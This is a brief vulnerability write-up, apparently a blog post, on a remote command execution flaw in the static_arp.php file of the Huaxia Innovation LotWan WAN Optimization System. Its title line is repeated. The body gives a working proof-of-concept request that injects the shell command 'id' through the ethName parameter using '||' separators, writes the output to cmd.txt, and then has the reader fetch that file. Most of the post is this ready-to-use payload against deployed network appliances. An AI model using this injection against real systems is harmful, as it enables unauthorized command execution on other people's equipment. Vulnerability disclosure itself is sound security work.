Huaxia Innovation Lotwan Wan Optimization System Static_arp Php Remote Command Execution Vulnerability
Huaxia Innovation Lotwan Wan Optimization System Static_arp Php Remote Command Execution Vulnerability
Huaxia Innovation LotWan WAN Optimization System static_arp.php Remote Command Execution Vulnerability
Vulnerability Description
Huaxia Innovation LotWan WAN Optimization System static_arp.php file parameter ethName has command splicing, resulting in remote command execution vulnerability
Vulnerability Impact
Huaxia Innovation LotWan WAN Optimization System
Network surveying and mapping
Vulnerability reappears
Login page
The file with vulnerability is
1
/acc/bindipmac/static_arp.php?ethName=||id>cmd.txt||
Visit /acc/bindipmac/cmd.txt again
This post is licensed under CC BY 4.0 by the author.